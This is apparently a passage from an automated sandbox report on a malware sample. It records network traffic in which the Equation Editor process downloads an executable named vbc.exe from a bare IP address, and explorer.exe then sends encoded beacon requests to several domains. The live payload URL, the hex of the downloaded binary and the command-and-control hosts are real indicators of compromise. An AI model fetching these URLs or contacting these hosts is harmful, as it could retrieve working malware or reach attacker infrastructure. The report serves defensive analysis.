                                                                                                                  SHA512:02100c08b063fc3d96fc4a2e3d56e5af605a11567e60575e2b8290a07ce3c5bdf6a3eb4380ab81e9eb83ca9b86736dbbff0fc1c46b48d5c79078a099b97d15db
                                                                                                                  SSDEEP:6144:SPU1FKJlr5uPCDCNPi1C6/SG9TikN8YOCQRUTfg5f07wPVWVCNn2BuLKs0frF:SUirr86Df1C6/SG9W28DIItDVWVkAh
                                                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  09/27/21-15:41:43.636930ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                  09/27/21-15:41:44.308837ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Sep 27, 2021 15:40:02.283526897 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.404189110 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.404364109 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.405010939 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.526333094 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.526458979 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.526469946 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.526551008 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.526588917 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.526624918 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.526629925 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.526659012 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.649210930 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649257898 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649279118 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649302959 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649327993 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649353981 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649374962 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649396896 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.649425030 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.649524927 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.649533987 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769495010 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769543886 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769593954 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769617081 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769654036 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769711018 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769717932 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769731045 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769735098 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769747972 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769769907 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769778967 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769783020 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769802094 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769820929 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769824028 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769845009 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769850016 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769860029 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769880056 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769892931 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769917011 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769928932 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769939899 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769963026 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.769963980 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769973993 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.769983053 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.770008087 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.771064043 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.771255970 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890348911 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890415907 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890444040 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890469074 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890567064 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890573978 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890598059 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890615940 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890625954 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890631914 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890645027 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890666962 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890712023 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890742064 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890763998 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890779018 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890813112 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890953064 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890959024 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.890969038 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.890994072 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891015053 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891031981 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891108990 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891117096 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891120911 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891145945 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891174078 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891206980 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891218901 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891235113 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891259909 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891283035 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891323090 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891331911 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891335011 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891349077 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891485929 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891510010 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891535044 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891556025 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891557932 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891576052 CEST804916723.95.13.176192.168.2.22
                                                                                                                  Sep 27, 2021 15:40:02.891581059 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891590118 CEST4916780192.168.2.2223.95.13.176
                                                                                                                  Sep 27, 2021 15:40:02.891597033 CEST804916723.95.13.176192.168.2.22

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Sep 27, 2021 15:41:19.722501040 CEST5216753192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:19.845834017 CEST53521678.8.8.8192.168.2.22
                                                                                                                  Sep 27, 2021 15:41:25.773036003 CEST5059153192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:26.082412958 CEST53505918.8.8.8192.168.2.22
                                                                                                                  Sep 27, 2021 15:41:31.479510069 CEST5780553192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:31.615899086 CEST53578058.8.8.8192.168.2.22
                                                                                                                  Sep 27, 2021 15:41:39.926955938 CEST5903053192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:40.928584099 CEST5903053192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:41.948414087 CEST5903053192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:42.653177977 CEST53590308.8.8.8192.168.2.22
                                                                                                                  Sep 27, 2021 15:41:43.636710882 CEST53590308.8.8.8192.168.2.22
                                                                                                                  Sep 27, 2021 15:41:44.308614016 CEST53590308.8.8.8192.168.2.22
                                                                                                                  Sep 27, 2021 15:41:48.449984074 CEST5918553192.168.2.228.8.8.8
                                                                                                                  Sep 27, 2021 15:41:48.495470047 CEST53591858.8.8.8192.168.2.22

                                                                                                                  ICMP Packets

                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                  Sep 27, 2021 15:41:43.636929989 CEST192.168.2.228.8.8.8d016(Port unreachable)Destination Unreachable
                                                                                                                  Sep 27, 2021 15:41:44.308836937 CEST192.168.2.228.8.8.8d016(Port unreachable)Destination Unreachable

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Sep 27, 2021 15:41:19.722501040 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.atelifer.comA (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:25.773036003 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.floridawp.comA (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:31.479510069 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.viscoent.onlineA (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:39.926955938 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.meta-bot.xyzA (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:40.928584099 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.meta-bot.xyzA (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:41.948414087 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.meta-bot.xyzA (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:48.449984074 CEST192.168.2.228.8.8.80x9037Standard query (0)www.dermaqueeniran.comA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Sep 27, 2021 15:41:19.845834017 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.atelifer.comzhs.zohosites.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:19.845834017 CEST8.8.8.8192.168.2.220xc18cNo error (0)zhs.zohosites.com204.141.43.204A (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:26.082412958 CEST8.8.8.8192.168.2.220xfc43No error (0)www.floridawp.com107.187.86.150A (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:31.615899086 CEST8.8.8.8192.168.2.220x9c63No error (0)www.viscoent.online209.17.116.163A (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:42.653177977 CEST8.8.8.8192.168.2.220x30e0No error (0)www.meta-bot.xyz203.170.129.2A (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:43.636710882 CEST8.8.8.8192.168.2.220x30e0No error (0)www.meta-bot.xyz203.170.129.2A (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:44.308614016 CEST8.8.8.8192.168.2.220x30e0No error (0)www.meta-bot.xyz203.170.129.2A (IP address)IN (0x0001)
                                                                                                                  Sep 27, 2021 15:41:48.495470047 CEST8.8.8.8192.168.2.220x9037Server failure (2)www.dermaqueeniran.comnonenoneA (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • 23.95.13.176
                                                                                                                  • www.atelifer.com
                                                                                                                  • www.floridawp.com
                                                                                                                  • www.viscoent.online
                                                                                                                  • www.meta-bot.xyz

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.224916723.95.13.17680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 27, 2021 15:40:02.405010939 CEST0OUTGET /rpm/vbc.exe HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                  Host: 23.95.13.176
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Sep 27, 2021 15:40:02.526333094 CEST1INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 27 Sep 2021 13:40:02 GMT
                                                                                                                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
                                                                                                                  Last-Modified: Mon, 27 Sep 2021 09:27:39 GMT
                                                                                                                  ETag: "99000-5ccf6b55049f0"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 626688
                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8b 8e 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 84 09 00 00 0a 00 00 00 00 00 00 82 a2 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a2 09 00 4f 00 00 00 00 c0 09 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 82 09 00 00 20 00 00 00 84 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 c0 09 00 00 08 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 09 00 00 02 00 00 00 8e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 a2 09 00 00 00 00 00 48 00 00 00 02 00 05 00 14 94 01 00 b4 9d 02 00 03 00 00 00 f9 02 00 06 c8 31 04 00 68 70 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 72 01 00 00 70 2a 1a 72 1b 00 00 70 2a 1e 19 8d 10 00 00 01 2a 1e 02 28 16 00 00 0a 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 86 02 03 28 0c 00 00 06 02 04 28 0e 00 00 06 04 2c 0f 04 8e 2c 0b 03 7e 17 00 00 0a 6f 33 03 00 06 2a 8a 02 03 28 0c 00 00 06 02 04 28 10 00 00 06 04 28 18 00 00 0a 2d 0b 03 7e 17 00 00 0a 6f 33 03 00 06 2a ce 02 28 0b 00 00 06 25 6f 32 03 00 06 03 28 19 00 00 0a 6f 33 03 00 06 02 28 0b 00 00 06 25 6f 32 03 00 06 72 31 00 00 70 28 19 00 00 0a 6f 33 03 00 06 2a 72 02 28 16 00 00 0a 02 03 28 17 00 00 06 02 04 28 19 00 00 06 02 05 28 1b 00 00 06 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 22 02 03 28 17 00 00 06 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0f 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0 @ @0O H.text `.rsrc@@.reloc@BdH1hprp*rp**(*{*"}*{*"}*{*"}*{*"}*{*"}*((,,~o3*(((-~o3*(%o2(o3(%o2r1p(o3*r((((*{*"}*{*"}*{*"}*"(*{*"}*{*"}*{*"}*{*"}*{*"}*{


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.2249168204.141.43.20480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 27, 2021 15:41:20.012839079 CEST663OUTGET /scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ HTTP/1.1
                                                                                                                  Host: www.atelifer.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Sep 27, 2021 15:41:20.176945925 CEST665INHTTP/1.1 404
                                                                                                                  Server: ZGS
                                                                                                                  Date: Mon, 27 Sep 2021 13:41:20 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 4639
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: 0cea9df7db=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                                                                  X-XSS-Protection: 1
                                                                                                                  Set-Cookie: csrfc=0df0bdc9-2601-49d6-80c3-ae437cb5333b;path=/;priority=high
                                                                                                                  Set-Cookie: _zcsr_tmp=0df0bdc9-2601-49d6-80c3-ae437cb5333b;path=/;SameSite=Strict;priority=high
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                  vary: accept-encoding
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35
                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.2249169107.187.86.15080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 27, 2021 15:41:26.307230949 CEST669OUTGET /scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ HTTP/1.1
                                                                                                                  Host: www.floridawp.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Sep 27, 2021 15:41:26.471569061 CEST670INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 27 Sep 2021 13:41:26 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.2249170209.17.116.16380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 27, 2021 15:41:34.757893085 CEST671OUTGET /scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ HTTP/1.1
                                                                                                                  Host: www.viscoent.online
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
